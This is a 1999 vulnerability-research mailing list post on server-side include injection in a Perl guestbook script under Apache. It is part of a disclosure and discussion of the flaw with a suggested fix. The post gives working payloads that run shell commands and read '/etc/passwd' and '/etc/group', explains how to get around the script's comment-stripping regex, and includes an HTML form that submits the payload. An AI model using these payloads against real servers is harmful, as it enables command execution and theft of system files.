Vulnerability Development mailing list archives
Re: Guestbook perl script (error fix)
From: BlueBoar () THIEVCO COM (Blue Boar)
Date: Mon, 4 Oct 1999 19:09:16 -0700
drch wrote:
what if $FORM{'url'} == ><!--#include file="/etc/passwd" --
I finally got around to playing with this today. The short answer is, it worked perfectly. The long answer is a little more disturbing. I believe I've spotted a deficiency in Apache. I installed the latest version of Apache (1.3.9 when I grabbed it) from source on my Sparc/Solaris 2.5.1 machine using GCC 2.8.1. The only change I can recall making was to correct the server name, and to add SSI: # diff httpd.conf httpd.conf.default 274c274 < ServerName XXXXXXXX ---
#ServerName XXXXXXXX
315c315 < Options Indexes FollowSymLinks Includes ---
Options Indexes FollowSymLinks
680,681c680,681 < AddType text/html .shtml < AddHandler server-parsed .shtml ---
#AddType text/html .shtml #AddHandler server-parsed .shtml
I had to modify the guestbook script for the appropriate directories and
filenames, but it's otherwise the same one we've been discussing. HTML
enabled.
During my testing of the exploit, I've found that all of these work:
<!--#exec cmd="cat /etc/group"-->
<!--#exec cmd="cat /etc/group">
<!--#exec cmd="cat /etc/group"
This works even in the middle of a line of HTML code!
What am I missing? Clearly, the author of the guestbook.pl script expected
SSI lines to end in --> :
$value =~ s/<!--(.|\n)*-->//g;
It turns out that one can get around this much easier than previously
stated. Just leave off the -->
I don't know a lot about SSI. Can someone help me with that? This seems a
little TOO flexible for safety's sake.
Can anyone else verify that their web server behaves similarly, and that I
haven't configured or compiled something funny? I haven't had time to dig
into the Apache code yet.
I suggest that folks look for lines that have <!-- in them, and dump the
whole line for safety's sake, when writing such scripts. In my brief
testing, the entire <!-- prefix seemed necessary.
For completeness' sake, I should state that, at least for the script as
written, SSI must be enabled for .html files, as the guestbook.html is that
type. In my example, I went out of my way to make it guestbook.shtml,
which I would not expect to find "in the wild." And yes, my web host DOES
have some of the virtual domains set up that way. I gave them a little
advanced notice for purposes of CYA. :) I won't tell which ones. I did my
testing on my own machine, not on my web hosting provider.
BB
P.S. For those who want to see a piece of the work in progress that led to
this, here's a short bit of HTML I was using as an "exploit" of sorts.
<body>
<form method=POST action="http://www.example.com/cgi-bin/guestbook.pl";>
Your Name:
<input type=text name="realname" size=41 value="a">
URL:
<input type=text name="url" size=80 value='<!--#exec cmd="cat /etc/group'>
Comments:
<input type=text name="comments" VALUE="a">
<input type=submit VALUE=Send> <input type=reset>
</form>
</body>
Current thread:
- Re: Guestbook perl script (error fix) Blue Boar (Oct 04)
- Re: Guestbook perl script (error fix) Matt Carothers (Oct 08)
- Newbie in Jeopardy Me Uh, K. (Oct 06)
- Re: Newbie in Jeopardy Nimrod Vered (Oct 09)
- Re: Guestbook perl script (error fix) Erik Parker (Oct 08)
- SSH and X11 forwarding Rob Quinn (Oct 08)
- fbsd 3.3 ospf_monitor research Brock Tellier (Oct 08)
- Re: fbsd 3.3 ospf_monitor research Jeff Bachtel (Oct 10)
- Re: fbsd 3.3 ospf_monitor research Andrew Reiter (Oct 11)
- restoretextmode problems robert (Oct 11)
- Newbie in Jeopardy Me Uh, K. (Oct 06)
- NT SysKey should be breakable Mikael Olsson (Oct 08)
- Re: Guestbook perl script (error fix) Matt Carothers (Oct 08)